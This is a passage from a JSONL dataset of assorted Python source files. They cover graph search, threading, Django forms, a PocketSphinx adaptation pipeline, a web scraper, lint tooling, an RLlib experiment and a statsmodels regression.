arcpy.da.SearchCursor('select_bin_lyr', 'BIN') as cursor:\n for row in cursor:\n bin_list.append(row[0])\n\n arcpy.Delete_management('build_lyr')\n arcpy.Delete_management('select_bin_lyr')\n arcpy.Delete_management('in_memory/buffer')\n\n return bin_list\n\nprint(select_bin_ids('1011258', footprints_file, '400 Feet'))\n\nprint(yup)","sub_path":"students/ksutton/BBL_LPC/select_bin_ids.py","file_name":"select_bin_ids.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"390432244","text":"from collections import deque\n\n\n# A class to represent a graph object\nclass Graph:\n # Constructor\n def __init__(self, edges, N):\n # A list of lists to represent an adjacency list\n self.adjList = [[] for _ in range(N)]\n\n # add edges to the undirected graph\n for (src, dest) in edges:\n self.adjList[src].append(dest)\n\n\n# Function to perform DFS traversal in a directed graph to find the\n# complete path between source and destination vertices\ndef isConnected(graph, src, dest, discovered, path):\n # mark the current node as discovered\n discovered[src] = True\n\n # include the current node in the path\n path.append(src)\n\n # if destination vertex is found\n if src == dest:\n return True\n\n # do for every edge `src —> i`\n for i in graph.adjList[src]:\n\n # if `u` is not yet discovered\n if not discovered[i]:\n # return true if the destination is found\n if isConnected(graph, i, dest, discovered, path):\n return True\n\n # backtrack: remove the current node from the path\n path.pop()\n\n # return false if destination vertex is not reachable from src\n return False\n\n\nif __name__ == '__main__':\n\n # List of graph edges as per the above diagram\n edges = [\n (0, 3), (1, 0), (1, 2), (1, 4), (2, 7), (3, 4),\n (3, 5), (4, 3), (4, 6), (5, 6), (6, 7)\n ]\n\n # total number of nodes in the graph (labeled from 0 to `N-1`)\n N = 8\n\n # build a graph from the given edges\n graph = Graph(edges, N)\n\n # to keep track of whether a vertex is discovered or not\n discovered = [False] * N\n\n # source and destination vertex\n (src, dest) = (0, 10)\n\n # List to store the complete path between source and destination\n path = deque()\n\n # perform DFS traversal from the source vertex to check the connectivity\n # and store path from the source vertex to the destination vertex\n if isConnected(graph, src, dest, discovered, path):\n print(\"Path exists from vertex\", src, \"to vertex\", dest)\n print(\"The complete path is\", list(path))\n else:\n print(\"No path exists between vertices\", src, \"and\", dest)\n\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"209711031","text":"'''\n동시 작업 수행 -thread\n'''\n\n\"\"\"\n첫 번째 for문에서 ['you', 'need', 'python']이라는 리스트의 요소 개수만큼 스레드가 생성되고, \n생성된 스레드는 say 메서드를 수행하게 되어 1초에 한 번씩 입력으로 받은 msg 변수값을 리턴합니다.\n스레드는 메인 프로그램과는 별도로 실행되어 집니다.\nt.daemon = True와 같이 daemon 플래그를 설정하면 주 프로그램이 종료되는 순간 데몬 스레드도 함께 종료된다.\n\"\"\"\n\nimport threading\nimport time\n\ndef say(msg):\n while True:\n time.sleep(1)\n print(msg)\n\nfor msg in ['just', 'do', 'it']:\n t = threading.Thread(target=say, args=(msg,))\n t.daemon = True\n t.start()\n\n\"\"\"\n두 번째 for문은 매 0.1초마다 0부터 99까지 숫자를 출력하는데, \n바로 이 부분이 메인 프로그램이 되며 이 메인 프로그램이 종료되는 순간 생성된 스레드들도 함께 종료가 됩니다.\n\n\"\"\"\nfor i in range(100):\n time.sleep(0.1)\n print(i)","sub_path":"PythonMain/src/ch17-thread/ex01.py","file_name":"ex01.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"619813268","text":"# Copyright 2019 IBM. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\n\"\"\"\nrewrite.py\n\nGraph rewrites that ship with the GraphDef Editor.\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nfrom typing import Tuple, Dict, FrozenSet, Iterable, Union\n\nfrom graph_def_editor import graph, node, util, tensor, variable\n\n\n__all__ = [\n \"change_batch_size\",\n]\n\n\ndef change_batch_size(g: graph.Graph,\n new_size: int,\n inputs: Iterable[Union[node.Node, tensor.Tensor]]):\n \"\"\"\n Change the batch size of a model.\n\n Runs size inference over the graph to propagate the new batch size\n throughout the graph.\n\n Modifies the graph in place. If the rewrite fails, the graph may be left\n in an inconsistent state.\n\n Args:\n g: The graph on which to modify the batch size. Modified in place.\n new_size: New batch size to apply on the input(s) to the graph.\n Can be `None` to indicate dynamic batch size.\n inputs: Placeholder nodes that are the input to the graph, either\n the `Node`s themselves or as their output `Tensor`s\n \"\"\"\n input_nodes = [i.node if isinstance(i, tensor.Tensor) else i\n for i in inputs]\n\n # Basic sanity checks\n for n in input_nodes:\n if n.op_type != \"Placeholder\":\n raise ValueError(\"Input node {} is not a Placeholder\".format(n))\n if n.graph is not g:\n raise ValueError(\"Input node {} is not in graph {}\".format(n, g))\n\n # Update input nodes\n for n in input_nodes:\n orig_shape = n.get_attr(\"shape\")\n new_dims = [d for d in orig_shape.dims]\n new_dims[0] = new_size\n n.replace_attr(\"shape\", tf.TensorShape(new_dims))\n\n # Propagate new batch size throughout graph\n g.infer_shapes_and_dtypes()\n\n\n\n\n\n\n","sub_path":"graph_def_editor/rewrite.py","file_name":"rewrite.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"237407318","text":"from django import template\n\nimport json\nfrom collections import Mapping\n\nregister = template.Library()\n\n\n@register.filter\ndef transform_parameters(parameters):\n keys_set = {'optional', 'max_occurrence'}\n transformed_dictionary = {}\n for key, value in parameters.items():\n if key not in keys_set:\n if isinstance(value, Mapping):\n if 'Enumeration' in value:\n transformed_dictionary.update({key: 'Enumeration'})\n else:\n transformed_dictionary[key] = transform_parameters(value)\n else:\n transformed_dictionary.update({key: value})\n return transformed_dictionary\n\n\n@register.filter\ndef parameters_to_json(parameters):\n dictionary = transform_parameters(parameters)\n return json.dumps(dictionary, indent=4, separators=(',', ': '))\n\n","sub_path":"SOAP/templatetags/tags_extra.py","file_name":"tags_extra.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"484606981","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 13 18:00:39 2016\n\n@author: Pankaj\n\"\"\"\nfrom subprocess import call\nimport sys\nimport os\nimport codecs\nimport time\nimport adapter.unicodedata2 as uc\nfrom adapter.lm import lmgen\nfrom adapter.adcfg import voice_derivatives\nfrom adapter.adutil import file_split\nfrom adapter.adutil import create_fileids\nfrom adapter.adutil import create_transcripts\nfrom adapter.adutil import read_words\nfrom adapter.adutil import create_dictionary\nimport make_local_pdict as ml\n\n\nwavdir = \"E:\\\\New_Corpus\"\nbindir = \"E:\\\\AudioTranscriptVerifier\\\\bin\"\nlmname = \"E:\\\\AudioTranscriptVerifier\\\\adapter\\\\etc\\\\adaptation.lm\"\ntransfile = \"etc\\\\hindi_model_train.transcription\"\ntrfile = \"etc\\\\train.transcription\"\nsuper_prompts_file = \"etc\\\\hindi_model_train_prompt.txt\"\nphonefile = \"..\\\\bin\\\\phonemap.txt\"\nhindi_phone_file = \"..\\\\bin\\\\hindiphone.txt\"\ninfile = \"etc\\\\hindi_model_train_prompt.txt\"\nvocabfile = \"etc\\\\hindi_model_train_vocab.txt\"\noutfile = \"etc\\\\hindi_model_train_adaptation.dic\"\ndictutil = \"E:\\\\AudioTranscriptVerifier\\\\bin\\\\progen.exe\"\n\ntrain_fileid = \"etc\\\\hindi_model_adapt.fileids\"\nmfc_fileids_file = \"etc\\\\hindi_model_adapt_mfc.fileids\"\n\nwavdir = \"E:\\\\New_Corpus\"\nmfcdir = \"E:\\\\New_Corpus\"\nmetadata = \"metadata\"\n\nrootdir = \"E:\\\\AudioTranscriptVerifier\"\n\norg_model = rootdir + \"\\\\\" + \"models\\\\en-us\"\nadapt_model = rootdir + \"\\\\\" + \"models\\\\en-us-adapt\"\n\ntrain_dict = \"..\\\\train.dic\"\nlanguage_model = \"..\\\\reverie.lm\"\ndictionary = train_dict\t\nhypfile = \"result\\\\hindi_adapt.hyp.txt\"\ncepdir = wavdir\nwavdirs_and_files = [\t\t\n\t\t\t\t\t\t# [\"\\\\train\\\\others\\\\accomodation\\\\Niyanta\",\"bohni.raw\",\"bohni.txt\"],\n\t\t\t\t\t\t# [\"\\\\train\\\\others\\\\accomodation\\\\Final\\\\anubhav\",\"anubhav.raw\",\"anubhav.txt\"],\n\t\t\t\t\t\t# [\"\\\\train\\\\others\\\\accomodation\\\\ToBeVerified\\\\part4\",\"part4.raw\",\"part4.txt\"],\n\t\t\t\t\t\t# [\"\\\\train\\\\others\\\\accomodation\\\\ToBeVerified\\\\Niyanta\\\\part12\",\"part12.raw\",\"part12.txt\"],\n\t\t\t\t\t\t[\"\\\\train\\\\others\\\\accomodation\\\\ToBeVerified\\\\arun\",\"1.raw\",\"1.txt\"],\n]\n\n# Delete existing .raw files if any from train_audio folder\n# First split the raw audio files in audio segments\nfor rawfiles in wavdirs_and_files:\n\tdirname = rawfiles[0]\n\tinraw_file = wavdir + \"\\\\\" + dirname + \"\\\\\" + rawfiles[1]\n\trawdir = wavdir + \"\\\\\" + dirname + \"\\\\\" + \"train_audio\"\n\tcallcmd = \"del \" + rawdir + \"\\\\*.raw\"\n\tcall(callcmd,shell=True)\n\tfile_split(bindir,inraw_file,rawdir)\n\n# Check whether transcripts file lines are equal to no of raw files\nDIR = wavdir + \"\\\\\" + wavdirs_and_files[0][0]\nprint (\"helllo\")\ntranscriptscnt=0\nrawfilescnt=0\nfor name in os.listdir(DIR+\"\\\\\"+\"train_audio\"):\n\tif os.path.isfile(os.path.join(DIR+\"\\\\\"+\"train_audio\", name)):\n\t\trawfilescnt=rawfilescnt+1\n\nwith open(DIR+\"\\\\\"+wavdirs_and_files[0][2],\"r\",encoding=\"utf-8\") as fr:\n\tfor f in fr:\n\t\ttranscriptscnt=transcriptscnt+1\nif transcriptscnt!=rawfilescnt:\n\tprint(\"Mismatch in Transcripts and rawfiles count\")\n\tprint(\"Rawfiles_Count= \"+str(rawfilescnt))\n\tprint(\"Transcripts_Count= \" + str(transcriptscnt))\n\texit(1)\nprint(\"Rawfiles_Count= \"+str(rawfilescnt))\nprint(\"Transcripts_Count= \" + str(transcriptscnt))\n\n# create train_audio and train_mfc directories\ndirlist = []\n#mfdirlist = []\nfor lst in wavdirs_and_files:\n\tprint(lst[0])\n\tdirlist.append(lst[0])\n\t\n#for lst in dirlist:\n#\tmfdirlist.append(lst + \"\\\\train_mfc\")\n\n#print(dirlist)\n\n# create fileids\n\ncreate_fileids(wavdir,dirlist,train_fileid,mfc_fileids_file)\n\n\t\t\t\naudiodir = wavdir\n\ntransdir = wavdir\nscriptlist = []\n\nfor lst in wavdirs_and_files:\n\tscriptlist.append(lst[0] + \"\\\\\" + lst[2])\n\t\nprint(scriptlist)\n\ndirlist = []\nfor lst in wavdirs_and_files:\n\tdirlist.append(lst[0] + \"\\\\train_audio\")\n\t\nprint(dirlist)\n\ncreate_transcripts(transfile,super_prompts_file,trfile,scriptlist,dirlist,wavdir)\n\nml.createDictionary(super_prompts_file, train_dict)\n#create_dictionary(\"..\\\\eng.dic\",super_prompts_file,dictutil,phonefile,train_dict)\n\ndirlist = []\nfor lst in wavdirs_and_files:\n\tprint(lst[0])\n\tdirlist.append(lst[0])\n\ncall(\"E:\\\\AudioTranscriptVerifier\\\\bin\\\\sphinx_fe -argfile\" + \" \" + org_model + \"\\\\feat.params\" + \\\n\t\t\t\t\t \" -samprate 16000\" + \" -c\" + \" \" + train_fileid + \\\n\t\t\t\t \" -di\" + \" \" + wavdir + \\\n\t\t\t\t \" -do\" + \" \" + mfcdir + \\\n\t\t\t\t \" -ei raw -eo mfc -mswav no\",shell=True\n\t\t\t\t )\n\nfor di in dirlist:\n\tdirname = wavdir + \"\\\\\" + di\n\tprint(dirname)\n\tsrcdir = dirname + \"\\\\train_audio\"\n\tprint(srcdir)\n\tdstdir = dirname + \"\\\\train_mfc\"\n\tcallstr = \"mkdir\" + \" \" + dstdir\n#\tprint(callstr)\n\tcall(callstr,shell=True)\n\tcallstr = \"move\" + \" \" + srcdir + \"\\\\*.mfc\" + \" \" + dstdir \n#\tprint(callstr)\n\tcall(callstr,shell=True)\n\ntime.sleep(2)\n\ncall(\"E:\\\\AudioTranscriptVerifier\\\\bin\\\\pocketsphinx_mdef_convert\" + \" -text\" + \" \" + org_model + \"\\\\mdef\" + \" \" + org_model + \"\\\\mdef.txt\",shell=True)\n\ntime.sleep(2)\n\nprint(\"calling bw\")\ncall(\n\t\t\"E:\\\\AudioTranscriptVerifier\\\\bin\\\\bw\" + \" \" + \"-hmmdir\" + \" \" + org_model + \\\n\t\t\t\t\t\" -moddeffn\" + \" \" + org_model + \"\\\\mdef.txt\" + \\\n\t\t\t\t\t\" -ts2cbfn .ptm. -feat 1s_c_d_dd -svspec 0-12/13-25/26-38\" + \\\n\t\t\t\t\t\" -cmn current -agc none -dictfn\" + \" \" + train_dict + \\\n\t\t\t\t\t\" -ctlfn\" + \" \" + mfc_fileids_file + \\\n\t\t\t\t\t\" -lsnfn\" + \" \" + transfile + \\\n\t\t\t\t\t\" -accumdir\" + \" \" + metadata\n )\ntime.sleep(2)\nprint(\"calling mmlr_solve\")\ncall(\n\t\t\"E:\\\\AudioTranscriptVerifier\\\\bin\\\\mllr_solve\" + \" \" + \"-meanfn\" + \" \" + org_model + \"\\\\means\" + \\\n\t\t\t\t\t\t\t\t \" -varfn\" + \" \" + org_model + \"\\\\variances\" + \\\n\t\t\t\t\t\t\t\t \" -outmllrfn\" + \" \" + metadata + \"\\\\mllr_matrix\" + \\\n\t\t\t\t\t\t\t\t \" -accumdir\" + \" \" + metadata,shell=True\n )\t\n\ntime.sleep(2)\n\nprint(\"copying models\")\ncallstr = \"md\" + \" \" + adapt_model\nprint(callstr)\ncall(callstr,shell=True)\ncall(\"copy E:\\\\AudioTranscriptVerifier\\\\models\\\\en-us\\\\*.* E:\\\\AudioTranscriptVerifier\\\\models\\\\en-us-adapt\",shell=True)\n\ntime.sleep(2)\nprint(\"calling map_adapt\")\ncall(\n\t\t\"E:\\\\AudioTranscriptVerifier\\\\bin\\\\map_adapt\" + \" \" + \"-moddeffn\" + \" \" + org_model + \"\\\\mdef.txt\" + \\\n\t\t\t\t\t\t \" -ts2cbfn .ptm. \" + \\\n\t\t\t\t\t\t\t \" -meanfn\" + \" \" + org_model + \"\\\\means\" + \\\n\t\t\t\t\t\t\t \" -varfn\" + \" \" + org_model + \"\\\\variances\" + \\\n\t\t\t\t\t\t\t \" -mixwfn\" + \" \" + org_model + \"\\\\mixture_weights\" + \\\n\t\t\t\t\t\t\t \" -tmatfn\" + \" \" + org_model + \"\\\\transition_matrices\" + \\\n\t\t\t\t\t\t\t \" -accumdir\" + \" \" + metadata + \\\n\t\t\t\t\t\t\t \" -mapmeanfn\" + \" \" + adapt_model + \"\\\\means\" + \\\n\t\t\t\t\t\t\t \" -mapvarfn\" + \" \" + adapt_model + \"\\\\variances\" + \\\n\t\t\t\t\t\t\t \" -mapmixwfn\" + \" \" + adapt_model + \"\\\\mixture_weights\" + \\\n\t\t\t\t\t\t\t \" -maptmatfn\" + \" \" + adapt_model + \"\\\\transition_matrices\"\n )\n\t\ntime.sleep(2)\nprint(\"calling sendump\")\n\ncall(\n\t\t\"E:\\\\AudioTranscriptVerifier\\\\bin\\\\mk_s2sendump\" + \" \" + \"-pocketsphinx yes\" + \\\n\t\t\t\t\t\t \" -moddeffn\" + \" \" + adapt_model + \"\\\\mdef.txt\" + \\\n\t\t\t\t\t\t\t\t\t\" -mixwfn\" + \" \" + adapt_model + \"\\\\mixture_weights\" + \\\n\t\t\t\t\t\t\t\t\t\" -sendumpfn\" + \" \" + adapt_model + \"\\\\sendump\" \n )\n\ntime.sleep(2)\t\n\n\n#lmgen(infile,lmname)\n\n'''\nprint(\"calling pocketsphinx_batch\")\t\ncall(\n\t\t\"E:\\\\AudioTranscriptVerifier\\\\bin\\\\pocketsphinx_batch\" + \\\n\t\t\" -adcin yes\" + \\\n\t\t\" -cepdir\" + \" \" + cepdir + \\\n\t\t\" -cepext\" + \" \" + \".raw\" + \\\n\t\t\" -ctl\" + \" \" + train_fileid + \\\n\t\t\" -lm\" + \" \" + language_model + \\\n\t\t\" -dict\" + \" \" + dictionary + \\\n\t\t\" -hmm\" + \" \" + adapt_model + \\\n\t\t\" -hyp\" + \" \" + hypfile\n\t\t#\" -mllr\" + \" \" + metadata + \"\\\\mllr_matrix\" \n )\n\n\t\n\t\ntime.sleep(2)\t\n\t\ncallcmd = \"perl E:\\\\AudioTranscriptVerifier\\\\bin\\\\word_align.pl\" + \" \" + trfile + \" \" + hypfile \nprint(callcmd)\ncmdcall = callcmd + \" > result\\\\res_adapt.txt\"\nprint(cmdcall)\ncall(\n\t\tcmdcall, shell=True\n )\n'''\n'''\t\nprint(\"calling pocketsphinx_batch\")\t\ncall(\n\t\t\"E:\\\\AudioTranscriptVerifier\\\\bin\\\\pocketsphinx_batch\" + \\\n\t\t\" -adcin yes\" + \\\n\t\t\" -cepdir\" + \" \" + cepdir + \\\n\t\t\" -cepext\" + \" \" + \".raw\" + \\\n\t\t\" -ctl\" + \" \" + train_fileid + \\\n\t\t\" -lm\" + \" \" + language_model + \\\n\t\t\" -dict\" + \" \" + dictionary + \\\n\t\t\" -hmm\" + \" \" + org_model + \\\n\t\t\" -hyp\" + \" \" + hypfile\n\t\t#\" -mllr\" + \" \" + metadata + \"\\\\mllr_matrix\" \n )\n\n\t\n\t\ntime.sleep(2)\t\n\t\nc allcmd = \"perl E:\\\\AudioTranscriptVerifier\\\\bin\\\\word_align.pl\" + \" \" + trfile + \" \" + hypfile \nprint(callcmd)\ncmdcall = callcmd + \" > result\\\\res.txt\"\nprint(cmdcall)\ncall(\n\t\tcmdcall, shell=True\n )\n'''","sub_path":"adapter/ad.py","file_name":"ad.py","file_ext":"py","file_size_in_byte":8085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"558318749","text":"##min_likes = 500\n##min_shares = 100\n##\n##num_likes = 550\n##num_shares = 101\n##\n##if num_likes < min_likes:\n## print(\"Za mało lików do promocji\")\n##else:\n## if num_shares < min_shares:\n## print(\"za mało szerów do promocji\")\n## else:\n## print(\"Ceny idą w dół\")\n## \n##print('----')\n##\n##if num_likes < min_likes:\n## print(\"Za mało lików do promocji\")\n##elif num_shares < min_shares:\n## print(\"za mało szerów do promocji\")\n##else:\n## print(\"Ceny idą w dół\")\n\n##if num_likes >= MIN_LIKES and num_shares >= MIN_SHARES:\n##\n## print('GREAT! Today our prizes drop 10% !!!')\n##\n##else:\n##\n## if num_likes = MIN_LIKES and num_shares >= MIN_SHARES:\n##\n## print('GREAT! Today our prizes drop 10% !!!')\n##\n##elif num_likes diskSizeUsed and fileSize > 0 and fileSize <= diskSize-diskSizeUsed:\n## print(\"file can be downloaded\")\n##else:\n## print(\"brak miejsca na dysku\")\n","sub_path":"Python_courses/Python_dla_poczatkujacych/06_72_IfElif_LAB.py","file_name":"06_72_IfElif_LAB.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"645949353","text":"import base64\nimport re\nimport uuid\n\nfrom django import forms\n\nfrom botbot.apps.accounts import models as accounts_models\nfrom . import models\n\nserver_regex = re.compile(r\"^[\\w\\-\\.]*\\:\\d*$\")\n\nclass ChannelForm(forms.ModelForm):\n identifiable_url = forms.BooleanField(\n required=False, initial=True, help_text=\"Identifiable URLs may leak \"\n \"channel information as part of the referrer details if when URL \"\n \"is clicked from the logs\")\n\n class Meta:\n model = models.Channel\n fields = ('chatbot', 'name', 'password', 'is_public', 'is_active')\n\n def save(self, *args, **kwargs):\n \"\"\"\n If it's an identifiable url, set the slug to ``None``.\n\n If it's not an identifiable url, set the slug to a random value if it\n is not already set.\n \"\"\"\n if self.cleaned_data['identifiable_url']:\n self.instance.slug = None\n elif not self.instance.slug:\n channels = models.Channel.objects.all()\n while not self.instance.slug or\\\n channels.filter(slug=self.instance.slug).exists():\n self.instance.slug = base64.b32encode(uuid.uuid4().bytes)[:4]\\\n .lower()\n return super(ChannelForm, self).save(*args, **kwargs)\n\nclass ChannelRequestForm(forms.Form):\n channel_name = forms.CharField()\n server = forms.CharField(label=\"IRC Server\")\n github = forms.URLField(label=\"GitHub Repo URL\",\n help_text=\"If the channel supports a github repo, the url to the repo.\",\n required=False)\n\n name = forms.CharField(label=\"Your name\")\n email = forms.EmailField(label=\"Your e-mail\")\n nick = forms.CharField(label=\"Your IRC Nick\")\n op = forms.BooleanField(label=\"Are you a channel op?\")\n\n def clean_channel_name(self):\n channel_name = self.cleaned_data['channel_name']\n if models.Channel.objects.filter(name=channel_name).exists():\n raise forms.ValidationError(\"Sorry, this channel is already being monitored.\")\n\n return channel_name\n\n def clean_server(self):\n server = self.cleaned_data['server']\n if not server_regex.match(server):\n raise forms.ValidationError(\"Incorrect format, should be :\")\n return server\n\n\nclass UsersForm(forms.Form):\n users = forms.ModelMultipleChoiceField(required=False,\n queryset=accounts_models.User.objects.all())\n\n def __init__(self, channel, *args, **kwargs):\n super(UsersForm, self).__init__(*args, **kwargs)\n self.channel = channel\n if channel:\n self.fields['users'].initial = [p.pk for p in channel.users.all()]\n\n def save(self):\n users = self.cleaned_data['users']\n self.channel.membership_set.exclude(user__in=users).delete()\n for user in users:\n self.channel.membership_set.get_or_create(user=user)\n","sub_path":"botbot/apps/bots/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"265401998","text":"import lxml.html as html\nimport requests\nimport sys\nimport json\n\n\ndef main():\n data = []\n main_domain = ['/page1/']\n while main_domain:\n\n req = requests.get('https://habr.com' + main_domain[0])\n page = html.fromstring(req.content)\n main_domain_stats = page.xpath(\n '//li[contains(@class, \"content-list__item\")]/article[contains(@class, \"post\")]/h2/a/@href'\n )\n for main_domain_stat in main_domain_stats:\n req = requests.get(main_domain_stat)\n page = html.fromstring(req.content)\n\n article = page.xpath(\n '//div[@class=\"post__wrapper\"]'\n )\n title = article[0].xpath(\n './h1/span/text()'\n )\n text = article[0].xpath(\n './div[contains(@class, \"post__body\")]/div[contains(@class, \"post__text\")]//text()'\n )\n images = article[0].xpath(\n './div[contains(@class, \"post__body\")]/div[contains(@class, \"post__text\")]/img/@src'\n )\n\n data.append({\n 'title': title[0],\n 'content': {\n 'text': text,\n 'images': images\n }\n })\n print('https://habr.com' + main_domain[0])\n\n req = requests.get('https://habr.com' + main_domain[0])\n page = html.fromstring(req.content)\n main_domain = page.xpath(\n '//li[@class=\"arrows-pagination__item\"]/a[contains(@class, \"arrows-pagination__item-link_next\")]/@href'\n )\n with open('Output.txt', 'w') as outfile:\n json.dump(data, outfile, indent=3, ensure_ascii=False)\n outfile.close()\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"habr_parsing/habr_parsing.py","file_name":"habr_parsing.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"405010995","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import (\n absolute_import, division, print_function, unicode_literals\n)\n\nimport subprocess\nimport sys\n\nimport six\nfrom flake8.main import main as flake8_main\nfrom libmodernize.main import main as libmodernize_main\n\n\nCODE_PATHS = [\n 'lint.py',\n 'pyticketswitch',\n 'tests',\n]\n\n\ndef main():\n exit_on_failure(run_flake8())\n exit_on_failure(run_modernize())\n exit_on_failure(run_isort())\n\n\ndef run_flake8():\n print('Running flake8 code linting')\n try:\n original_argv = sys.argv\n sys.argv = ['flake8'] + CODE_PATHS\n did_fail = False\n flake8_main()\n except SystemExit:\n did_fail = True\n finally:\n sys.argv = original_argv\n\n if did_fail:\n print('flake8 failed')\n else:\n print('flake8 passed')\n return did_fail\n\n\ndef run_modernize():\n print('Running modernize checks')\n try:\n orig_stdout = getattr(sys, 'stdout')\n out = six.StringIO()\n setattr(sys, 'stdout', out)\n libmodernize_main(CODE_PATHS)\n finally:\n sys.stdout = orig_stdout\n output = out.getvalue()\n print(output)\n ret = len(output)\n if ret:\n print('modernize failed')\n else:\n print('modernize passed')\n return ret\n\n\ndef run_isort():\n print('Running isort check')\n return subprocess.call([\n 'isort', '--recursive', '--check-only', '--diff',\n '-a', 'from __future__ import absolute_import, print_function, division, unicode_literals',\n ] + [x for x in CODE_PATHS if x != 'tests'])\n\n\ndef exit_on_failure(ret):\n if ret:\n sys.exit(ret)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"lint.py","file_name":"lint.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"420421948","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# Date: 2017/11/30\n\n\"\"\"\n 命名元组\n\"\"\"\n\nfrom collections import namedtuple\n\n\n# demo1\n# subscriber = namedtuple(\"Subscriber\", [\"addr\", \"joined\"])\n#\n# sub = subscriber(\"jonesy@example.com\", \"2012-10-19\")\n#\n# print(type(sub), )\n\n\n# demo2\nstock = namedtuple(\"Stock\", [\"name\", \"shares\", \"price\"])\n\n\ndef compute_cost(records):\n total = 0.0\n for rec in records:\n s = stock(*rec)\n total += s.shares * s.price\n\n return total\n\nprint(compute_cost([(\"tom\", 11, 123)]))\n\n\n","sub_path":"20171130/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"169189946","text":"import numpy as np\nimport ray\nfrom ray import tune\nfrom ray.rllib.agents.trainer_template import build_trainer\nfrom ray.tune.registry import register_env\n\nfrom hotrl import EXPERIMENTS_DIR\nfrom hotrl.envs.house import House\nfrom hotrl.envs.house_logger import HouseLogger\nfrom hotrl.envs.wrappers import FullyObsWrapper\nfrom hotrl.rllib_experiments.trainables import MaintenancePolicy\n\nsize = 4\ninside_temp = 15.\noutside_temp = 5.\n\nenv_config = dict(\n size=size,\n homies_params=[{'initial_room': 'Bedroom'}],\n temperatures=np.pad(\n np.full((size - 2, size - 2), fill_value=inside_temp),\n pad_width=[(1, 1), (1, 1)],\n mode='constant',\n constant_values=outside_temp\n ),\n heat_model_config=dict(\n RSI=4.2 * 2,\n heater_output=1000,\n ),\n homie_reward_scaler=tune.function(lambda x: x ** 5 if x < 1 else x),\n)\n\nregister_env(\"House\", lambda config: FullyObsWrapper(House(**config)))\nray.init(\n local_mode=True,\n)\n\ntrials = tune.run(\n # run_or_experiment=dqn_train,\n run_or_experiment=build_trainer(\n name=\"MaintenanceTrainer\",\n default_policy=MaintenancePolicy),\n loggers=[HouseLogger],\n verbose=1,\n local_dir=EXPERIMENTS_DIR,\n config={\n \"model\" : {\n # List of [out_channels, kernel, stride] for each filter\n \"conv_filters\": [\n [2, [4, 4], 1]\n ],\n },\n \"env\" : \"House\",\n \"env_config\": env_config\n },\n)\n","sub_path":"dqn_learning.py","file_name":"dqn_learning.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"579131586","text":"from __future__ import unicode_literals\n\nfrom reviewboard.extensions.packaging import setup\n\n\nPACKAGE = \"{{extension_name}}\"\nVERSION = \"0.1\"\n\nsetup(\n name=PACKAGE,\n version=VERSION,\n description=\"{{description}}\",\n author=\"{{author}}\",\n packages=[\"{{package_name}}\"],\n entry_points={\n 'reviewboard.extensions':\n '%s = {{package_name}}.extension:{{class_name}}' % PACKAGE,\n },\n package_data={\n b'{{package_name}}': [\n 'templates/{{package_name}}/*.txt',\n 'templates/{{package_name}}/*.html',\n ],\n }\n)\n","sub_path":"contrib/tools/templates/extensions/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"112966556","text":"\n# coding: utf-8\n\n# ##### Linear Regression\n\n# #### Libraries\n\n# In[24]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\nimport numpy as np\nimport pandas as pd\nimport statsmodels.api as sm\nfrom sklearn import datasets\nimport statsmodels.stats.api as sms\nimport matplotlib.pyplot as plt\nfrom statsmodels.compat import lzip\nimport statsmodels.formula.api as smf\n\n\n# #### Data\n\n# In[2]:\n\n\ndata = datasets.load_boston()\ndf = pd.DataFrame(data.data, columns=data.feature_names)\ntarget = pd.DataFrame(data.target, columns=[\"MEDV\"])\n\n\n# #### Regression\n\n# In[4]:\n\n\nX = df[\"RM\"]\nX = sm.add_constant(X)\ny = target[\"MEDV\"]\nmodel = sm.OLS(y, X)\nresults = model.fit()\nprint(results.summary())\n\n\n# ##### Predictions\n\n# In[21]:\n\n\npredictions = results.predict(X)\npredictions\n\n\n# ##### Parameters\n\n# 